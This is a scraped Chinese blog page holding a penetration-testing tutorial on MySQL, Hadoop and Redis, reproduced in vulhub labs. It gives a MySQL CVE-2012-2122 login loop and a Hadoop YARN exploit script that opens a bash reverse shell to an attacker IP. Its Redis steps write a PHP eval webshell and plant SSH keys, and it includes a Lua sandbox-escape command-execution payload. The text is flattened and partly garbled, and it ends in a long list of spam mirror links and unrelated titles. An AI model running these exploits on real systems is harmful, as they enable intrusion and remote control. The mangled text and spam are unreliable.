当前位置: 首页 > news >正文

建设网站证书不受信任设计素材网站哪个好

建设网站证书不受信任,设计素材网站哪个好,网站报错500,全国新农村建设中心网站MySQL Mysql 身份认证绕过漏洞#xff08;CVE-2012-2122#xff09; 当连接MariaDB/MySQL时#xff0c;输入的密码会与期望的正确密码比较#xff0c;由于不正确的处理#xff0c;会导致即便是memcmp()返回一个非零值#xff0c;也会使MySQL认为两个密码是相同的。也就…MySQL Mysql 身份认证绕过漏洞CVE-2012-2122 当连接MariaDB/MySQL时输入的密码会与期望的正确密码比较由于不正确的处理会导致即便是memcmp()返回一个非零值也会使MySQL认为两个密码是相同的。也就是说只要知道用户名不断尝试就能够直接登入SQL数据库。 受影响版本 - MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. - MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not. 这是MySQL已知的唯一漏洞下面通过vulhub容器复现 环境启动后将启动一个Mysql服务版本5.5.23监听3306端口通过正常的Mysql客户端可以直接登录的正确root密码是123456。 漏洞验证 在不知道我们环境正确密码的情况下在bash下运行如下命令在一定数量尝试后便可成功登录 for i in seq 1 1000; do mysql -uroot -pwrong -h your-ip -P3306 ; done 此外就是尝试账号密码爆破要注意的是MySQL默认配置本地登录root用户远程的连接请求是拒绝的可以通过如phpmyadmin等数据库管理工具通过本地到本地的过程来测试 Hadoop 漏洞原因 Hadoop是一个由Apache基金会所开发的分布式系统基础架构由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口黑客可以通过命令行操作多个目录下的数据如进行删除下载目录浏览甚至命令执行等操作产生极大的危害。 这里推荐一个靶场 vulfocus.io,不知道为什么启动失败了后面开启了一个vulhub的容器 启动环境访问/cluster/apps如果界面存在就有未授权访问漏洞 使用官方EXP可以在vulhub.org下载 #!/usr/bin/env pythonimport requeststarget http://127.0.0.1:8088/ lhost 192.168.0.1 # put your local host ip here, and listen at port 9999url target ws/v1/cluster/apps/new-application resp requests.post(url) app_id resp.json()[application-id] url target ws/v1/cluster/apps data {application-id: app_id,application-name: get-shell,am-container-spec: {commands: {command: /bin/bash -i /dev/tcp/%s/9999 01 % lhost,},},application-type: YARN, } requests.post(url, jsondata) 漏洞修复: 关闭Web管理界面设置安全组和防火墙限制只有信任的IP才可以访问hadoop的50070等端口 Redis redis是一个开源的、使用C语言编写的、支持网络交互的、可基于内存也可持久化的Key-Value数据库。 Redis未授权 redis的redis.conf配置条件有一个bind 127.0.0.1如果这个选项开启只有本机才能访问redis否则任何ip都可以访问此外还有一个叫protected-mode 安全模式默认为no不开启此外连接redis后可以通过config set requirepass 123456 来设置密码否则redis就没有密码可以通过 redis-cli -h ip地址直接连接 这里我先把所有安全措施关闭模拟配置不当导致漏洞,利用条件 写webshell需Web路径Web目录权限可读写可尝试tmp目录 写定时任务反弹shell bind和安全模式都未开启 config get dir #查看redis数据库路径 config set dir /root/redis-2.8.17# #修改靶机Redis数据库路径 config set dbfilename 22.php #生成22.php文件 set xxx \r\n\r\n?php phpinfo();?\r\n\r\n#将一句话木马写入文件中 #\r\n\r\n是换行的意思用redis写入文件会自带一些版本信息如果不换行可能导致无法执行。 set xxx \r\n\r\n?php eval($_POST[whoami]);?\r\n\r\n#上传木马可以通过蚁剑连接 save#保存 写入linux ssh-key公钥 除以上权限要求root权限允许密钥登录 ssh-keygen -t rsa cd /root/.ssh/ (echo -e  n,;cat id _rsa.pub,;echo -e n) key.txt cat key.txt I redis-cli -h 118.31.57.214 -h set yc config set dir /root/ssh/ config set dbfilename authorized _keys save cd /root/ ssh/ ssh - id_rsa root118.31.57.214 主从复制反弹shell  由于在Reids 4.x及以上版本5版本以下中新增了模块功能攻击者可通过外部拓展在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块在未授权访问的情况下使被攻击服务器加载恶意.so 文件从而实现远程代码执行。 可以下载一个利用工具git clone https://github.com/vulhub/redis-rogue-getshell.git Redis 沙盒转义和远程代码执行 存在此漏洞是因为 Debian/Ubuntu 中的 Lua 库是作为动态库提供的。自动填充一个变量该变量又允许访问任意 Lua 功能。package 例如正如这扩展到您可以使用从liblua加载模块然后使用此模块执行命令package.loadlib POC: eval local io_l package.loadlib(/usr/lib/x86_64-linux-gnu/liblua5.1.so.0, luaopen_io); local io io_l(); local f io.popen(id, r); local res f:read(*a); f:close(); return res 0 MSF破解redis密码 此外还可以考虑使用msf等工具对密码进行爆破
文章转载自:
http://www.morning.lgsfb.cn.gov.cn.lgsfb.cn
http://www.morning.lmknf.cn.gov.cn.lmknf.cn
http://www.morning.jynzb.cn.gov.cn.jynzb.cn
http://www.morning.rrqbm.cn.gov.cn.rrqbm.cn
http://www.morning.qzsmz.cn.gov.cn.qzsmz.cn
http://www.morning.zlnkq.cn.gov.cn.zlnkq.cn
http://www.morning.qrwjb.cn.gov.cn.qrwjb.cn
http://www.morning.yfnjk.cn.gov.cn.yfnjk.cn
http://www.morning.fpkpz.cn.gov.cn.fpkpz.cn
http://www.morning.ymjgx.cn.gov.cn.ymjgx.cn
http://www.morning.qqtzn.cn.gov.cn.qqtzn.cn
http://www.morning.qgmbx.cn.gov.cn.qgmbx.cn
http://www.morning.thlzt.cn.gov.cn.thlzt.cn
http://www.morning.hmjasw.com.gov.cn.hmjasw.com
http://www.morning.jyyw.cn.gov.cn.jyyw.cn
http://www.morning.xqmd.cn.gov.cn.xqmd.cn
http://www.morning.jwlmm.cn.gov.cn.jwlmm.cn
http://www.morning.zbnkt.cn.gov.cn.zbnkt.cn
http://www.morning.bpncd.cn.gov.cn.bpncd.cn
http://www.morning.txzqf.cn.gov.cn.txzqf.cn
http://www.morning.zxrtt.cn.gov.cn.zxrtt.cn
http://www.morning.wtbzt.cn.gov.cn.wtbzt.cn
http://www.morning.hgtr.cn.gov.cn.hgtr.cn
http://www.morning.ymhzd.cn.gov.cn.ymhzd.cn
http://www.morning.wbfg.cn.gov.cn.wbfg.cn
http://www.morning.kjdxh.cn.gov.cn.kjdxh.cn
http://www.morning.dcccl.cn.gov.cn.dcccl.cn
http://www.morning.rlcqx.cn.gov.cn.rlcqx.cn
http://www.morning.knjj.cn.gov.cn.knjj.cn
http://www.morning.wmnpm.cn.gov.cn.wmnpm.cn
http://www.morning.spghj.cn.gov.cn.spghj.cn
http://www.morning.gdgylp.com.gov.cn.gdgylp.com
http://www.morning.dkbsq.cn.gov.cn.dkbsq.cn
http://www.morning.pdghl.cn.gov.cn.pdghl.cn
http://www.morning.qbfs.cn.gov.cn.qbfs.cn
http://www.morning.bytgy.com.gov.cn.bytgy.com
http://www.morning.tdhxp.cn.gov.cn.tdhxp.cn
http://www.morning.zwgbz.cn.gov.cn.zwgbz.cn
http://www.morning.ggnjq.cn.gov.cn.ggnjq.cn
http://www.morning.wnmdt.cn.gov.cn.wnmdt.cn
http://www.morning.kqcqr.cn.gov.cn.kqcqr.cn
http://www.morning.jwpcj.cn.gov.cn.jwpcj.cn
http://www.morning.lcdtb.cn.gov.cn.lcdtb.cn
http://www.morning.bpmnc.cn.gov.cn.bpmnc.cn
http://www.morning.frpfk.cn.gov.cn.frpfk.cn
http://www.morning.pwlxy.cn.gov.cn.pwlxy.cn
http://www.morning.jmnfh.cn.gov.cn.jmnfh.cn
http://www.morning.mbrbg.cn.gov.cn.mbrbg.cn
http://www.morning.hmbxd.cn.gov.cn.hmbxd.cn
http://www.morning.homayy.com.gov.cn.homayy.com
http://www.morning.gxhqt.cn.gov.cn.gxhqt.cn
http://www.morning.zkpwk.cn.gov.cn.zkpwk.cn
http://www.morning.lltdf.cn.gov.cn.lltdf.cn
http://www.morning.pggkr.cn.gov.cn.pggkr.cn
http://www.morning.1000sh.com.gov.cn.1000sh.com
http://www.morning.cdrzw.cn.gov.cn.cdrzw.cn
http://www.morning.qbkw.cn.gov.cn.qbkw.cn
http://www.morning.zlhbg.cn.gov.cn.zlhbg.cn
http://www.morning.gfhng.cn.gov.cn.gfhng.cn
http://www.morning.kxsnp.cn.gov.cn.kxsnp.cn
http://www.morning.enjoinfo.cn.gov.cn.enjoinfo.cn
http://www.morning.dpplr.cn.gov.cn.dpplr.cn
http://www.morning.zlhbg.cn.gov.cn.zlhbg.cn
http://www.morning.fplqh.cn.gov.cn.fplqh.cn
http://www.morning.kjlhb.cn.gov.cn.kjlhb.cn
http://www.morning.fdrb.cn.gov.cn.fdrb.cn
http://www.morning.tjqcfw.cn.gov.cn.tjqcfw.cn
http://www.morning.lcjw.cn.gov.cn.lcjw.cn
http://www.morning.pmsl.cn.gov.cn.pmsl.cn
http://www.morning.tnmmp.cn.gov.cn.tnmmp.cn
http://www.morning.yqkxr.cn.gov.cn.yqkxr.cn
http://www.morning.dppfh.cn.gov.cn.dppfh.cn
http://www.morning.lsgjf.cn.gov.cn.lsgjf.cn
http://www.morning.ynwdk.cn.gov.cn.ynwdk.cn
http://www.morning.lkrmp.cn.gov.cn.lkrmp.cn
http://www.morning.gwdnl.cn.gov.cn.gwdnl.cn
http://www.morning.gllgf.cn.gov.cn.gllgf.cn
http://www.morning.kysport1102.cn.gov.cn.kysport1102.cn
http://www.morning.drswd.cn.gov.cn.drswd.cn
http://www.morning.qsbcg.cn.gov.cn.qsbcg.cn
http://www.tj-hxxt.cn/news/246197.html

相关文章:

  • 网站制作制作上海网优化seo公司
  • 银行网站建设前期合同百度商桥代码怎么添加到网站
  • 经营网站的备案开网店详细步骤
  • 龙华个人网站建设wordpress适合移动端的主题
  • 衡阳网站推广排名潮南最新消息今晚
  • 织梦网站模板免费金融营销的网站设计案例
  • 桐城住房建设网站关注公众号一单一结兼职
  • 网站服务器如何维护网站怎么做透明导航
  • 港海建设网站浏览器主页网址推荐
  • 南宁网站优化推广seo哪家强
  • wordpress会员网站网站管理员怎么做
  • wordpress 网站变慢合肥重点工程建设局
  • 青岛网站建设seo国外企业画册设计网站
  • 百度统计 网站速度诊断怎样申请自己的电商平台
  • 丰都集团网站建设微信公众号开发者中心
  • 如何选择购物网站建设一个免费的网站
  • 网站的二维码怎么做企业营销型网站建设方案
  • 郑州专业的网站建设公司排名给公众号做头像的网站
  • 网站建设收费标准wordpress uctheme
  • 个人网站如果做凡客精选app下载
  • 胶州网站建设公司哪家好做的最好自考网站是哪个
  • 网站做防篡改红酒网站制作
  • 怎么在国税网站上做实名认证吗免费标志在线设计生成
  • 佛山网站建设找哪家免费建站网站一级大
  • 松江区网站建设公司企业网站管理系统的运维服务
  • 做淘宝一件代发的网站学做网站要代码
  • 郑州市建设局官方网站京东网站的设计特点
  • 更改各网站企业信息怎么做四川省微信网站建设推广
  • 呼市做网站wordpress phpwind
  • 专注郑州网站建设深圳专业做网站设计公司